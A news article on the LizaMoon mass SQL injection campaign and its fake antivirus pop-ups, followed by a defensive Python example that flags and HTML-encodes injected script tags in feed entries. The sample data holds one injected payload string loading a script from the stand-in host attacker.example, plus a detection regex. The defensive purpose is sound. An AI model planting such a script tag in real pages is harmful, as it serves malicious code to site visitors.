Security researchers are watching a mass SQL injection attack that is quickly spreading throughout the web, possibly already compromising over one million URLs by Friday afternoon. The attack injects a line of code into compromised sites that will trigger malicious pop-up ads.
Those affected may see a pop-up appear that informs them that there is malware on their computer and urges them to use a web-based antivirus program called “Windows Stability Center.” However, the victim is first asked to pay for the scan, which obviously would do nothing more than install malware on the user’s computer.
Not all antivirus software will detect this correctly as malware: a blog post on Friday indicated that less than half of antivirus applications that Websense tracks were correctly identifying it. Websense was first to make note of the attack on March 29.
“LizaMoon” — the name given to the attack — was initially thought to have affected some 28,000 sites. Since then the attack has spread quickly, and has even affected some legitimate Apple iTunes catalog links. It should be noted that Apple itself is not being attacked; rather, the RSS/XML feeds for podcasts listed on the site are.
When Apple picks up these feeds it encodes the script tags, thus making them non-executable. Websense senior manager of security research Patrik Runald applauded Apple for the move as it was obviously helping to limit the damage done from the attacks.
Apple’s not the only site that was affected — Runald believes that as many as 80 percent of sites now carrying the code are legitimate sites. Either way, Websense is still unsure how the injection is happening, so it could be very hard to stop the attack from spreading even further, quite possibly making this one of the largest SQL injection attacks ever.
Trend Micro, also following the issue, noted that the affected sites are not confined to any one category. “We saw compromised websites related to astronomy, clubs, hospitals, sports, funeral homes, electronics, and others,” it said.
The attack has been dubbed “LizaMoon” because the script it calls resides on the lizamoon.com domain. This single source was responsible for many of the code injections at the beginning of the attack; however, Runald noted that new sites were now apparently hosting the attack code as well.
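The two defensive points above, Apple encoding script tags in syndicated feeds so they cannot execute, and the injected code always loading a script from an external host, can be combined into a simple feed-side check. The following is an added example, not Apple’s or Websense’s code: it flags stored feed entries that carry an injected external script reference and HTML-encodes every entry before it is rendered. The feed entries and the attacker.example host are constructed sample data.

```python
import html
import re
from typing import List, Tuple

# Constructed sample: RSS-style entries, one of whose stored text was tainted
# by an injected <script> tag pointing at an external host (hypothetical
# domain; the page reports lizamoon.com and later other hosts being used).
FEED_ENTRIES = [
    ("Episode 12", "Stargazing tips for spring nights."),
    ("Episode 13", 'Club news</script><script src="http://attacker.example/ur.php"></script>'),
    ("Episode 14", "Hospital volunteer schedule for April."),
]

# Matches an external <script src="..."> reference and captures its host.
SCRIPT_SRC_RE = re.compile(
    r'<script[^>]*\bsrc\s*=\s*["\']?\s*(?:https?:)?//([^/"\'\s>]+)',
    re.IGNORECASE,
)


def injected_script_hosts(text: str) -> List[str]:
    """Return the hosts of any external <script src=...> tags in stored text."""
    return [m.group(1).lower() for m in SCRIPT_SRC_RE.finditer(text)]


def encode_for_html(text: str) -> str:
    """Encode stored text as inert HTML: '<' becomes '&lt;', so an injected
    script tag is displayed as literal characters instead of being executed."""
    return html.escape(text, quote=True)


def sanitize_feed(entries: List[Tuple[str, str]]):
    """Return (encoded entries, flagged entries) for a list of (title, body).

    Flagged entries list the external script hosts found in the stored body,
    which is the signal an operator would use to find injected database rows."""
    safe, flagged = [], []
    for title, body in entries:
        hosts = injected_script_hosts(body)
        if hosts:
            flagged.append((title, hosts))
        safe.append((title, encode_for_html(body)))
    return safe, flagged
```

Encoding alone keeps the pop-ups from firing; the flagged list is what points back at the rows that still need to be cleaned in the database.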